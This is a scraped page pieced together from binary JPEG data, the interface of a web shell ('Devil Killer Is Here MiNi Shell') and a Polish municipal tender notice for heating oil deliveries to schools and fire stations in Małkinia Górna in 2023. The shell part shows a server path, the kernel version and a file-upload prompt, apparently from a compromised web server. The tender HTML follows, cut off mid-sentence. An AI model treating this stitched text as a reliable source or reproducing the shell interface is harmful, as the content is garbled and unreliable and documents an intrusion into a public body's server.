JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221222/0051218801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Sukcesywna dostawa lekkiego oleju opałowego od 10 stycznia 2023 r. do 31 grudnia 2023 r. do placówek oświatowych, jednostek OSP oraz budynków będących własnością Gminy Małkinia Górna. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MAŁKINIA GÓRNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 550667920</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Przedszkolna 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Małkinia Górna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">07-320</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL924 - Ostrołęcki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">29 644 80 00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">29 74 55 118</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">poczta@malkiniagorna.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.malkiniagorna.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywna dostawa lekkiego oleju opałowego od 10 stycznia 2023 r. do 31 grudnia 2023 r. do placówek oświatowych, jednostek OSP oraz budynków będących własnością Gminy Małkinia Górna. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ce851529-81e7-11ed-94da-6ae0fe5e7159</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00512188</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00005272/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Sukcesywna dostawa lekkiego oleju opałowego od 10 stycznia 2023 r. do 31 grudnia 2023 r. do placówek oświatowych, jednostek OSP oraz budynków będących własnością Gminy Małkinia Górna.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu,<br/>który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem:<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej dbarszcz@malkiniagorna.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym <br/>a Wykonawcami w szczególności składanie oświadczeń, wniosków, zawiadomień oraz <br/>przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego <br/>formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez <br/>miniPortal. We wszelkiej korespondencji związanej z niniejszym postępowaniem <br/>Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP, TED lub ID <br/>postępowania).<br/>2) Zamawiający może również komunikować się z Wykonawcami za pomocą poczty <br/>elektronicznej, email: dbarszcz@malkiniagorna.pl <br/>3) Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza <br/>do komunikacji” jako załączniki. Zamawiający dopuszcza również możliwość składania <br/>dokumentów elektronicznych za pomocą poczty elektronicznej, na wskazany w pkt 2 adres <br/>email. Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami <br/>określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie <br/>sposobu sporządzania i przekazywania informacji oraz wymagań technicznych <br/>dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu <br/>o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz <br/>rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie <br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich <br/>może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).<br/>1) W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym <br/>a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl oraz ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej<br/>2) Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami: Panią Danutę Barszcz email: dbarszcz@malkiniagorna.pl <br/>3) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia <br/>publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP <br/>ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty <br/>lub wniosku” oraz do „Formularza do komunikacji”. <br/>4) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów <br/>elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji <br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu <br/>miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji <br/>publicznej(ePUAP). <br/>5) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB<br/>6) Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, <br/>oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji <br/>przyjmuje się datę ich przekazania na ePUAP. <br/>7) Dane postępowanie można wyszukać również na Liście wszystkich postępowań <br/>w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej <br/>z zakładki Postępowania.<br/><br/> Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania <br/>oferty lub wniosku” dostępnego na ePUAP i udostępnionego na miniPortalu. Funkcjonalność <br/>do zaszyfrowania oferty przez Wykonawcę jest dostępna dla Wykonawców na miniPortalu, <br/>w szczegółach danego postępowania. W formularzu oferty Wykonawca zobowiązany jest <br/>podać adres skrzynki ePUAP, na którym prowadzona będzie korespondencja związana <br/>z postępowaniem. <br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <br/> Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w „Instrukcji użytkownika”, dostępnej na stronie: https://miniportal.uzp.gov.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 <br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem <br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia <br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 <br/>z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1. Administratorem danych osobowych jest Wójt Gminy Małkinia Górna, ul. Przedszkolna 1, 07-320 Małkinia Górna<br/>2. Inspektorem ochrony danych osobowych jest Pani Aneta Liszewska, adres e-mail: jodo@malkiniagorna.pl. <br/>3. Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu <br/>związanym z postępowaniem o udzielenie zamówienia publicznego pn. „Sukcesywna dostawa lekkiego oleju opałowego od 10 stycznia 2023 r. do 31 grudnia 2023 r. do placówek oświatowych, jednostek OSP oraz budynków będących własnością Gminy Małkinia Górna”, prowadzonym w trybie podstawowym bez negocjacji. <br/>4. Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie <br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 78 ustawy Prawo zamówień publicznych.<br/>5. Dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat <br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy <br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; <br/>6. Obowiązek podania danych osobowych bezpośrednio dotyczących Państwa jest wymogiem <br/>ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem <br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania <br/>określonych danych wynikają z ustawy Pzp; <br/>7. W odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób <br/>zautomatyzowany, stosowanie do art. 22 RODO; <br/>8. Posiadacie Państwo: <br/>- na podstawie art. 15 RODO prawo dostępu do Państwa danych osobowych; <br/>- na podstawie art. 16 RODO prawo do sprostowania danych osobowych; <br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania <br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, <br/>ul. Stawki 2, 00-193 Warszawa, gdy uznacie Państwo, że przetwarzanie danych osobowych <br/>narusza przepisy RODO; <br/>9. Nie przysługuje Państwu: <br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, <br/>gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OAS.272.1.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem zamówienia jest sukcesywna dostawa oleju opałowego do placówek oświatowych, jednostek OSP oraz budynków będących własnością Gminy Małkinia Górna od 10 stycznia 2023 r. do 31 grudnia 2023 r., tj.: <br/>1	Szkoła Podstawowa nr 1 im. Marii Curie – Skłodowskiej w Małkini Górnej, ul. Ostrowska 58, 07-320 Małkinia Górna. <br/>2	Szkoła Podstawowa w Orle, Orło 11, 07-320 Małkinia Górna.<br/>3	Szkoła Podstawowa im. Jana Pawła II w Prostyni, Prostyń 60, 07-319 Prostyń. <br/>4	Żłobek Gminny w Małkini Górnej, ul. Nurska 67, 07-320 Małkinia Górna. <br/>5	Ochotnicza Straż Pożarna w Małkini Górnej, ul. Ostrowska 9, 07-320 Małkinia Górna. <br/>6	Ochotnicza Straż Pożarna w Grądach, Grądy 37, 07-319 Prostyń<br/>w terminie od 10 stycznia 2023 r. do 31 grudnia 2023 r.<br/>Planuje się, że dostawy oleju opałowego odbędą się zgodnie z prognozowaną ilością wg tabeli zawartej w SWZ.<br/>Przedmiot zamówienia odbierany będzie sukcesywnie, stosownie do potrzeb Zamawiającego. <br/>Dostarczany olej opałowy winien być I klasy jakości i spełniać następujące warunki jakościowe <br/>określone Polską Normą oraz charakteryzować się następującymi parametrami: <br/>1) wartość opałowa nie niższa niż: 42,60 MJ/kg, <br/>2) gęstość w temperaturze 15 0 C nie wyższa niż: 900 kg/m3, <br/>3) lepkość kinematyczna w temperaturze 20 0 C nie większa niż: 6,0 mm2/s, <br/>4) temperatura zapłonu nie niższa niż: 56 0 C, <br/>5) temperatura płynięcia nie wyższa niż: (-20 0 C), <br/>6) skład frakcyjny: <br/>a) do temperatury 250 0 C destyluje się nie więcej niż 65% (v/v), <br/>b) do temperatury 350 0 C destyluje się nie mniej niż 85% (v/v,) <br/>7) pozostałość po koksowaniu w 10% pozostałości destylacyjnej nie większa niż 0,30% (m/m), <br/>8) pozostałość po spopieleniu 0,010% (m/m), <br/>9) zawartość siarki nie więcej niż 0,10% (m/m), <br/>10) zawartość wody nie większa niż 200 mg/kg, <br/>11) całkowita zawartość zanieczyszczeń nie większa niż 24 mg/kg.<br/>Ze względu na specyfikę przedmiotu zamówienia, zamawiający nie jest w stanie precyzyjnie <br/>określić ilości oleju, który zostanie dostarczony do jednostek w okresie obowiązywania <br/>umowy. W tej sytuacji zarówno zamawiający, jak i Wykonawcy biorący udział w postępowaniu <br/>w swoich szacunkach mogą opierać się wyłącznie na danych archiwalnych, własnej wiedzy <br/>i doświadczeniu. <br/> Dostawa oleju będzie się odbywać na zgłoszenie pocztą elektroniczną: <br/>bezpośrednio do wskazanej jednostki, <br/>	w ciągu 48 godzin od zgłoszenia, <br/>	w ilościach określonych w zgłoszeniu – wraz z każdorazową dostawą przedkładane będą <br/>	świadectwa jakości, nie później niż z fakturą, <br/>	wymienione dostawy obejmują pełny zakres, t.j. załadunek na środek transportu, transport oraz rozładunek w miejscu przeznaczenia. Środek transportu musi być wyposażony w przewoźną instalację pomiarową z aktualnym świadectwem legalizacji. Dowodem przyjęcia dostawy oleju opałowego będzie dokument WZ z wydrukiem ilości faktycznej dostarczonego paliwa. Jest dopuszczalny wzrost lub spadek cen paliw niezależny od Dostawcy. W przypadku zmiany cen paliw w trakcie realizacji zamówienia, przy każdym zamówieniu cząstkowym musi być załączony przez Dostawcę komunikat o procentowym wzroście lub zniżce rynkowych cen paliw. Zamawiający zastrzega, iż z przyczyn niezależnych od niego, może nastąpić mniejsze lub większe wykorzystanie ilości przedmiotu zamówienia, bez konsekwencji dla Zamawiającego. <br/>Zamawiający wypełnił swoje obowiązki jako nabywca paliw opałowych, które wynikają <br/>z art. 89 ust. 5 pkt 1,3 i 4 ustawy z dnia 6 grudnia 2008 r. o podatku akcyzowym <br/>(Dz. U. z 2020 r., poz. 722 z późn. zm.). <br/>Gmina Małkinia Górna dokonała zgłoszenia rejestracyjnego w akcyzie (AKC-RU) i uzyskała status „zużywającego podmiotu olejowego”. Po podpisaniu umowy zarejestrowane dane zostaną przekazane Wykonawcy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09135100-5 - Olej opałowy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-10 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się<br/>następującymi<br/>kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Opis kryterium oceny Punktacja<br/>1. Cena 60 pkt<br/>2. Stały opust 40 pkt<br/><br/>Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100-punktowej.<br/>Cena – 60%<br/>Cena będzie oceniana metodą punktową według wzoru:<br/>Cena najtańszej oferty<br/>------------------------------------- x 60 pkt<br/>Cena badanej oferty<br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny.<br/>Stały opust – 40%<br/>Stały opust będzie oceniany według wzoru:<br/>Opust badanej oferty<br/>------------------------------------------------- x 40 pkt<br/>Najwyższy opust spośród oferowanych<br/>Łączna liczba punktów za ofertę = liczba punktów za cenę brutto (maks. 60)<br/>+ liczba punktów za stały opust (maks. 40 pkt)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Stały opust</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunki udziału w postępowaniu <br/>dotyczące: <br/>1) zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. <br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów: <br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że posiada. <br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada koncesję <br/>na obrót paliwami ciekłymi. <br/>3) sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. <br/>4) zdolności technicznej lub zawodowej: <br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. <br/>Zamawiający może, oceniając zdolność techniczną lub zawodową, na każdym etapie <br/>postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie <br/>przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów <br/>technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy <br/>może mieć negatywny wpływ na realizację zamówienia na każdym etapie postępowania <br/>(art. 116 ust. 2 ustawy Pzp). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) potwierdzających brak podstaw wykluczenia: <br/>a) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku <br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego <br/>2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 z późn. zm.), <br/>z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek <br/>o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej <br/>samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi <br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału <br/>w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy <br/>kapitałowej, <br/>b) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, <br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy <br/>wymagają wpisu do rejestru lub ewidencji, <br/>c) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu <br/>o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw 